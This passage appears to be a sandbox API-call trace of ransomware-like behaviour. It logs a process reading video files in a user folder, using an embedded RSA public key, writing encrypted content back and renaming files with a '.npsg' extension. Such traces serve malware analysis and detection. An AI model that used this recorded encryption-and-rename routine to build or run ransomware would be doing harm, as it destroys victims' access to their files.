lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b30 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b30 | out: hHeap=0x620000) returned 1 [0238.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b18 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b00 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86048 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.633] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x1181, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb14*=0x1181, lpOverlapped=0x0) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.633] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1186, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.633] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b88cd0 [0238.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.634] WriteFile (in: hFile=0x644, lpBuffer=0x3b88cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b88cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.634] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.634] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.634] CloseHandle (hObject=0x644) returned 1 [0238.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.635] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\EaxApzFb8.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\eaxapzfb8.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\EaxApzFb8.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\eaxapzfb8.mkv.npsg")) returned 1 [0238.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.636] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.637] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x740f9460, ftCreationTime.dwHighDateTime=0x1d5ba91, ftLastAccessTime.dwLowDateTime=0x3009e8a0, ftLastAccessTime.dwHighDateTime=0x1d5b79a, ftLastWriteTime.dwLowDateTime=0x3009e8a0, ftLastWriteTime.dwHighDateTime=0x1d5b79a, nFileSizeHigh=0x0, nFileSizeLow=0x18f81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JB Wo1tLixiw L.avi", cAlternateFileName="JBWO1T~1.AVI")) returned 1 [0238.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.638] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\JB Wo1tLixiw L.avi") returned=".avi" [0238.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\JB Wo1tLixiw L.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imxqhxuq\\jb wo1tlixiw l.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.638] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=102273) returned 1 [0238.638] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.641] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18f5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.641] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.643] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.643] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x18f81, lpOverlapped=0x0) returned 1 [0238.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.645] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.646] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.646] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.646] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.646] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.646] GetLastError () returned 0x0 [0238.646] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.646] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.646] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.646] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.646] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18f80) returned 0x3b95d50 [0238.647] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86048 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b00 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86090 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b18 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b60 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.648] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b60 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400b48 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b60 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b48 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.649] GetCurrentThreadId () returned 0x5b4 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87288 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.650] GetCurrentThreadId () returned 0x5b4 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b60 [0238.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bc0 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.652] 